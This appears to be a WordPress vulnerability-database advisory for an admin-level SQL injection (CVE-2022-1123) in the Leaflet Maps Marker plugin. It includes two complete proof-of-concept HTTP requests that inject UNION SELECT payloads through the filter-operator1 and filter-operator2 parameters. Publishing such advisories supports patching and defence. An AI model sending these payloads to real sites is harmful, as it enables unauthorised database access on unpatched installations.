WordPress Plugin Vulnerabilities

Leaflet Maps Marker < 3.12.5 - Admin+ SQLi

Description

The plugin does not properly sanitize some parameters before inserting them into SQL queries. As a result, high privilege users could perform SQL injection attacks.

Proof of Concept

PoC for filter-operator1 parameter:

POST /wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 476
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

action_standalone=export&filter-layer=select-all&limit-from=0&limit-to=100&filter-markername=_NOT_FOUND_&filter-operator1=)+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+&filter-popuptext=1&filter-exclude-markername=&filter-operator2=AND&filter-exclude-popuptext=&filter-icon=icon-any&export-format=csv&caching-method=auto&caching-discisam-directory=&caching-phptemp-filesize=8&submit=start+export

======
PoC for filter-operator2 parameter:


POST /wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 474
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/wp-content/plugins/leaflet-maps-marker/inc/import-export/start.php?action_iframe=export&_wpnonce=24f109ac38
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

action_standalone=export&filter-layer=select-all&limit-from=0&limit-to=100&filter-markername=&filter-operator1=&filter-popuptext=1&filter-exclude-markername=1&filter-operator2=)+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+&filter-exclude-popuptext=_NOT_FOUND_&filter-icon=icon-any&export-format=csv&caching-method=auto&caching-discisam-directory=&caching-phptemp-filesize=8&submit=start+export

Affects Plugins

Plugin icon
leaflet-maps-marker
Fixed in 3.12.5

References

CVE
CVE-2022-1123

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Ihor Bliumental
Submitter
Ihor Bliumental
Submitter website
https://bsg.tech/
Submitter twitter
igorblum
Verified
Yes
WPVDB ID
03e0d4d5-0184-4a15-b8ac-fdc2010e4812

Timeline

Publicly Published
2022-08-08 (about 1 years ago)
Added
2022-08-08 (about 1 years ago)
Last Updated
2023-05-05 (about 1 years ago)

Other

Published
Title
Published
2023-06-19
Title
All In One Redirection < 2.2.0 - Admin+ SQLi
Published
2014-08-01
Title
AdRotate <= 3.9.4 - clicktracker.php track Parameter SQL Injection
Published
2014-08-01
Title
Editorial Calendar 2.6 - Post Query Multiple Filter SQL Injection
Published
2014-08-01
Title
Collision Testimonials <= 3.0 - SQL Injection
Published
2022-07-18
Title
WPDating < 7.4.0 - Multiple Unauthenticated SQLi